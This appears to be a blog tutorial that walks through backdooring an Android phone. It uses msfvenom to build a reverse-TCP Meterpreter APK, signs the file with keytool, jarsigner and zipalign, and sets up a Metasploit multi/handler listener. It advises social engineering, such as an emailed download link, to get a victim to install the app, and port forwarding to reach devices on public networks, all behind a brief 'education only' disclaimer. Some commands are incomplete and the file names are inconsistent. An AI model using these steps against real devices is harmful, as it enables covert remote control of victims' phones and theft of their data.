Hack Android Devices

Hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk on victim mobile.

We will demonstrate this by using following tools-

  1. Kali Linux/ BackBox/ Parrot
  2. Android emulator
  3. Zipalign
  4. VMware or Virtual Box (virtual environment)

NOTE: This Lab is for education purpose only, BacKDoor not responsible for any illegal activity performed by the student.


Step 1: Starting Kali Linux /BackBox /Parrot

  • From your VM, Start the Kali Linux and log in with root/toor (Userid/Password).
  • Open a terminal prompt and make an exploit for Android emulator usingMSFvenom tool.

MSFvenom, it is a combination of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance and handles all possible output formats. MSFvenom used to make a payload to penetrate the android.

By using MSFvenom we create a payload .apk file for this we use following command:

In Terminal:

msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /root/Desktop/backdoor.apk

-p = Payload to be used

LHOST = Localhost IP to receive a back connection or reverse connection (Check yours with ifconfig command).

LPORT= Localhost Port on which the connection listen for the victim (We set it to 4444).

R = Raw format (We select apk).

/root/Desktop/ (Location) = to save the file

Note: In this command, we have used the local address because we are in the local environment. To this in the public network, you have to enter your public address in LHOST and enable the port forwarding on the Router.

After Successfully created .apk file, we need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate. Android devices only install the signed .apk files.

We need to sign the apk file manually in Kali Linux using:

  • Keytool (Preinstalled)
  • jar signer (Preinstalled)
  • zipalign (Need to Install)

To sign the apk file locally use these commands:

In Terminal:

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000


In Terminal:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname


In Terminal:

jarsigner -verify -verbose -certs APPNAME.apk

Zipalign is not preinstalled in Kali Linux, so you have to install it first


In Terminal:

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

Now we have signed our backdoor.apk file successfully and it can be run on any Android device. Our new filename is shooter.apk after the verification with zipalaign.

Now we have to start the listener on the Kali Linux /BackBox /Parrot machine with multi/handler exploit using Metasploit.

In Terminal:


Now launch the exploit multi/handler and use Android payload to listen to the clients.

In Terminal:     use exploit/multi/handler

Now set the options for payload, listener IP (LHOST) and listener PORT(LPORT). We have used localhost IP, port number 4444 and payload android/meterpreter/reverse_tcp while creating an APK file with MSFvenom.

Then we can successfully run the exploit and start listening to the android device. Now, the device installs our app on the device, and it gets penetrated with exploit

In Terminal:  exploit


Now we transfer the shooter.apk file to the victim mobile device. In our environment, we are using an android emulator to penetrate the Android device. For sharing shooter.apk to the victim an email link or share the downloading link to the mobile device.





LHOST – is a local host where you need to get session after payload execute

RHOST – remote host or target host

LPORT- Local port where you want session

RPORT – Remote port or target port number

Exploit – executing exploit

Payload – activity to perform after successful exploit execution

Exploit – malicious code to exploit vulnerability







Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.